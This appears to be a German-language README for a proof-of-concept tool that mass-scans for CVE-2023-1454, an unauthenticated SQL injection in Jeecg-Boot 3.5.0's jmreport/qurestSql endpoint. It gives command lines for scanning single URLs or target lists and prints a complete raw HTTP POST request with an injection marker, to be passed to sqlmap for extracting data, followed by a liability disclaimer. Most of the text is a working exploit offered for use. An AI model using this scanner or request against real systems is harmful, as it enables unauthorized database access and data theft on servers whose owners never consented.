
CVE-2023-1454,Jeecg-Boot SQL-Injection im Frontend,CVE-2023-1454 Massen-Scan
jmreport/qurestSql Unberechtigter SQL-Injection-Scan-PoC Jeecg-Boot ist eine schnelle Entwicklungsplattform basierend auf Spring Boot und Jeecg-Boot-Plus. In der neuesten Version jeecg-boot 3.5.0 wurden mehrere SQL-Injection-Schwachstellen entdeckt.
Das ursprüngliche Tool hatte eine hohe Fehlalarmrate. Ich habe die Erkennungsbedingungen geändert und den Code optimiert.
python3 CVE-2023-1454-scan.py -u http://127.0.0.1:1111 Test für einzelne URL
python3 CVE-2023-1454-scan.py -f url.txt Massenscan
Nach dem Scan wird im aktuellen Verzeichnis eine Datei vuln.txt mit den verwundbaren URLs erstellt.
PoC:

Exploit:
Speichern Sie den Datenverkehr in einer txt-Datei und verwenden Sie sqlmap, um die Daten zu extrahieren
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: xxx.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2088.112 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 129
{"apiSelectId":"1290104038414721025",
"id":"1*"}

Jegliche direkten oder indirekten Folgen oder Verluste, die durch die Verbreitung oder Nutzung der in diesem Dokument bereitgestellten Informationen entstehen, liegen in der alleinigen Verantwortung des Nutzers. Der Autor übernimmt keinerlei Haftung.